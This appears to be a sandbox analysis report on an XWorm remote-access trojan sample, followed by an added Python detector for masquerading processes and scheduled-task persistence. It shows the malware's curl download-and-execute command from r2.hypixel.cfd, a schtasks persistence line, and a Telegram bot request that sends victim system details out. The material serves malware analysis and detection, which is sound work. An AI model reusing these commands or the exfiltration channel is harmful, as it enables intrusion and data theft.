Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 21:03:03.600261927 CET | 1.1.1.1 | 192.168.2.7 | 0x1aa5 | No error (0) | r2.hypixel.cfd | | 172.66.0.158 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:03.600261927 CET | 1.1.1.1 | 192.168.2.7 | 0x1aa5 | No error (0) | r2.hypixel.cfd | | 162.159.140.160 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:03.600261927 CET | 1.1.1.1 | 192.168.2.7 | 0x1aa5 | No error (0) | r2.hypixel.cfd | | 172.66.0.102 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:03.600261927 CET | 1.1.1.1 | 192.168.2.7 | 0x1aa5 | No error (0) | r2.hypixel.cfd | | 162.159.140.104 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:10.099325895 CET | 1.1.1.1 | 192.168.2.7 | 0x69df | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 23, 2024 21:03:10.191384077 CET | 1.1.1.1 | 192.168.2.7 | 0x63d8 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:13.469187975 CET | 1.1.1.1 | 192.168.2.7 | 0x6bfa | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• r2.hypixel.cfd
• api.telegram.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 208.95.112.1 | 80 | 1456 | C:\Windows\StartMenuExperienceHost.exe

Timestamp | Bytes transferred | Direction | Data

Nov 23, 2024 21:03:10.321942091 CET | 80 | OUT
GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Nov 23, 2024 21:03:11.511277914 CET | 175 | IN
HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 20:03:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49701        172.66.0.158    443               7092  C:\Windows\System32\curl.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-23 20:03:04 UTC  89                 OUT        GET /svchost.exe HTTP/1.1
Host: r2.hypixel.cfd
User-Agent: curl/7.83.1
Accept: */*
2024-11-23 20:03:05 UTC  934                IN         HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 20:03:05 GMT
Content-Type: application/octet-stream
Content-Length: 79872
Connection: close
ETag: "9d9d23a73f3b3f53e8581d8bb31953c4"
Last-Modified: Fri, 22 Nov 2024 20:00:41 GMT
Vary: Accept-Encoding
Cache-Control: max-age=14400
CF-Cache-Status: REVALIDATED
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcicP5IChQMiVPpWC5KmNbNJnJ0YujR3tmrI%2BjZEvk54tYWHovOgfjq%2FWTfLKkw4M2iB9Y4j7D7%2FoH1X94e%2FhZB0TMklO2yI%2FF7yP4Ql4Td4v2v%2B4fKK5hO3hNM8%2Feavug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e73c2b5890d236b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=727&delivery_rate=1574973&cwnd=163&unsent_bytes=0&cid=9217aedae0941d30&ts=605&x=0"
2024-11-23 20:03:05 UTC  435                IN         Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL!@g.^M `@ @


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.7  49704        149.154.167.220  443               1456  C:\Windows\StartMenuExperienceHost.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-23 20:03:15 UTC  441                OUT        GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-23 20:03:15 UTC  344                IN         HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Sat, 23 Nov 2024 20:03:15 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-23 20:03:15 UTC  55                 IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 15:03:02
Start date: 23/11/2024
Path: C:\Users\user\Desktop\18sFhgSyVK.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\18sFhgSyVK.exe"
Imagebase: 0x7ff77c910000
File size: 89'088 bytes
MD5 hash: 4E0D7812ADEF8E43E4EAE77BF07DCC94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 15:03:02
Start date: 23/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 15:03:02
Start date: 23/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Imagebase: 0x7ff606a90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 15:03:02
Start date: 23/11/2024
Path: C:\Windows\System32\curl.exe
Wow64 process (32bit): false
Commandline: curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Imagebase: 0x7ff64a680000
File size: 530'944 bytes
MD5 hash: EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 15:03:04
Start date: 23/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 15:03:04
Start date: 23/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 15:03:04
Start date: 23/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 15:03:04
Start date: 23/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c color b
                                                                                                                Imagebase:0x7ff606a90000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Imagebase:0x7ff606a90000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Imagebase:0xb30000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:13
                                                                                                                Start time:15:03:08
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:14
                                                                                                                Start time:15:03:11
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                                                                                                                Imagebase:0x7ff6d6990000
                                                                                                                File size:235'008 bytes
                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:15:03:11
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:16
                                                                                                                Start time:15:03:12
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0xd70000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                Has exited:true
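
The records for Target IDs 11, 12, 14 and 16 show the two behaviours a hunter can check mechanically across a process listing: a binary that carries a Windows system name but runs from somewhere it never lives (StartMenuExperienceHost.exe directly under C:\Windows, svchost.exe under the user's Temp directory), and a schtasks /create that points a task named after a system binary at a user-writable path with a one-minute trigger and highest run level. The Python below is an added example, not code from Joe Sandbox or from the sample; it parses records in the report's own "key:value" layout, checks the process image and every executable named on the command line against an assumed table of legitimate home directories, and applies persistence heuristics to schtasks command lines. The home-directory table and the five sample records (trimmed copies of the records above) are the example's own assumptions.

```python
"""Flag process masquerading and scheduled-task persistence in Joe Sandbox process records.

Added example, not Joe Sandbox code. The directory expectations in SYSTEM_BINARY_HOMES are
assumptions: svchost.exe, cmd.exe, conhost.exe and schtasks.exe belong in System32 or SysWOW64,
and StartMenuExperienceHost.exe ships as a packaged app under the Windows SystemApps directory.
"""
import re
from pathlib import PureWindowsPath

SYSTEM_BINARY_HOMES = {
    "svchost.exe": ("c:\\windows\\system32", "c:\\windows\\syswow64"),
    "cmd.exe": ("c:\\windows\\system32", "c:\\windows\\syswow64"),
    "conhost.exe": ("c:\\windows\\system32",),
    "schtasks.exe": ("c:\\windows\\system32", "c:\\windows\\syswow64"),
    "startmenuexperiencehost.exe": ("c:\\windows\\systemapps",),
}
# Path fragments that an unprivileged user can write to; a task action here is a persistence red flag.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Executables named on a command line, either quoted (may contain spaces) or bare.
EXE_TOKEN = re.compile(r'"([^"]+?\.exe)"|([a-z]:\\[^\s"]+?\.exe)', re.I)


def parse_records(text):
    """Split the report's flat 'key:value' lines into one dict per process record."""
    records, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur:
                records.append(cur)
                cur = {}
            continue
        if line.startswith("•"):  # Yara / AV bullet lines are not needed for these checks
            continue
        key, sep, value = line.partition(":")  # first colon only: values hold drive letters and times
        if sep:
            cur[key.strip()] = value.strip()
    if cur:
        records.append(cur)
    return records


def unexpected_location(path):
    """Return (name, parent, homes) when a system-named binary sits outside its home, else None."""
    p = PureWindowsPath(path)
    name, parent = p.name.lower(), str(p.parent).lower()
    homes = SYSTEM_BINARY_HOMES.get(name)
    if homes and not any(parent == h or parent.startswith(h + "\\") for h in homes):
        return name, parent, homes
    return None


def schtasks_arg(cmd, flag):
    """Value following a schtasks flag, quoted or bare; '' when the flag is absent."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
    return (m.group(1) or m.group(2)) if m else ""


def schtasks_findings(cmd):
    """Persistence heuristics for a 'schtasks /create' command line."""
    if "/create" not in cmd.lower():
        return []
    out = []
    action = schtasks_arg(cmd, "/tr")
    if any(marker in action.lower() for marker in USER_WRITABLE):
        out.append(f"schtasks action points into a user-writable path: {action}")
    tn = schtasks_arg(cmd, "/tn").lower()
    if tn in SYSTEM_BINARY_HOMES or tn + ".exe" in SYSTEM_BINARY_HOMES:
        out.append(f"task name mimics a system binary: {tn}")
    if schtasks_arg(cmd, "/sc").lower() == "minute":
        every = int(schtasks_arg(cmd, "/mo") or 1)  # schtasks defaults /mo to 1
        if every <= 5:
            out.append(f"high-frequency trigger: every {every} minute(s)")
    if schtasks_arg(cmd, "/rl").upper() == "HIGHEST":
        out.append("task requests run level HIGHEST")
    return out


def analyse(text):
    """Map Target ID -> findings for every record that trips at least one check."""
    results = {}
    for rec in parse_records(text):
        path, cmd = rec.get("Path", ""), rec.get("Commandline", "")
        findings, flagged = [], set()
        # Check the process image and every .exe on its command line (child launches, task actions);
        # report each masquerading name once even if it appears as both Path and argument.
        for candidate in [path] + [a or b for a, b in EXE_TOKEN.findall(cmd)]:
            hit = unexpected_location(candidate)
            if hit and hit[0] not in flagged:
                name, parent, homes = hit
                flagged.add(name)
                findings.append(f"{name} running from {parent} (expected under {' or '.join(homes)})")
        if PureWindowsPath(path).name.lower() == "schtasks.exe":
            findings += schtasks_findings(cmd)
        if findings:
            results[rec.get("Target ID", "?")] = findings
    return results


# Constructed sample: five records copied (trimmed to the fields used) from the listing above.
SAMPLE_REPORT = r"""
Target ID:9
Path:C:\Windows\System32\svchost.exe
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc

Target ID:11
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe

Target ID:12
Path:C:\Windows\StartMenuExperienceHost.exe
Commandline:C:\Windows\StartMenuExperienceHost.exe

Target ID:14
Path:C:\Windows\System32\schtasks.exe
Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"

Target ID:16
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
"""

if __name__ == "__main__":
    for target, findings in analyse(SAMPLE_REPORT).items():
        print(f"Target {target}:")
        for finding in findings:
            print("  -", finding)
```

Running it flags Targets 11, 12, 14 and 16 and leaves the genuine svchost.exe (Target 9) alone; Target 14 alone produces five findings because the masquerading action path, the task name, the one-minute trigger and /RL HIGHEST each trip a separate heuristic. The short-name form user~1 that the sandbox prints on command lines is deliberately not expanded: the checks key on directory markers such as \AppData\ and \Temp\, so the 8.3 spelling of the profile directory does not matter.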

Target ID:18
Start time:15:03:21
Start date:23/11/2024
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Imagebase:0xd20000
File size:79'872 bytes
MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:16:38:56
Start date:23/11/2024
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Imagebase:0x750000
File size:79'872 bytes
MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:16:39:00
Start date:23/11/2024
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
Imagebase:0x680000
File size:79'872 bytes
MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:16:39:30
Start date:23/11/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:0x7ff6ed2b0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:16:39:30
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:16:40:01
Start date:23/11/2024
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
Imagebase:0xe30000
File size:79'872 bytes
MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:16:41:00
Start date:23/11/2024
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
Imagebase:0xd70000
File size:79'872 bytes
MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
                                                                                                                Start time:16:42:00
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0x7ff644d60000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true


Execution Graph

Execution Coverage:4.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:48.4%
Total number of Nodes:541
Total number of Limit Nodes:4

Control-flow Graph

• Executed
• Not Executed
call 7ff77c92050c 383->395 396 7ff77c91e0d2-7ff77c91e0dd 383->396 384->384 391 7ff77c91e28f-7ff77c91e29a system 384->391 388 7ff77c91e3f0-7ff77c91e419 385->388 387 7ff77c91e2f0-7ff77c91e3cd 386->387 387->387 392 7ff77c91e3d3-7ff77c91e3d6 387->392 388->388 393 7ff77c91e41b-7ff77c91e426 system 388->393 389->377 389->391 391->85 392->385 392->393 393->85 395->85 398 7ff77c91e0e0-7ff77c91e10d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 396->398 398->395
                                                                                                                  APIs
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C336
                                                                                                                  • GetConsoleWindow.KERNELBASE ref: 00007FF77C91C33C
                                                                                                                  • GetWindowLongW.USER32 ref: 00007FF77C91C34D
                                                                                                                  • SetWindowLongW.USER32 ref: 00007FF77C91C362
                                                                                                                  • SetLayeredWindowAttributes.USER32 ref: 00007FF77C91C376
                                                                                                                  • GetConsoleWindow.KERNELBASE ref: 00007FF77C91C37C
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91C38A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C4C9
                                                                                                                  • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C512
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C6B4
                                                                                                                  • _Thrd_detach.MSVCP140 ref: 00007FF77C91C6D7
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C7A9
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C845
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C905
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91C944
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91C962
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91C96D
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C9E5
                                                                                                                  • remove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF77C91CD44
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91CD4F
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 00007FF77C91CD90
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91CD9E
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91CE69
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D035
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D186
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D2D6
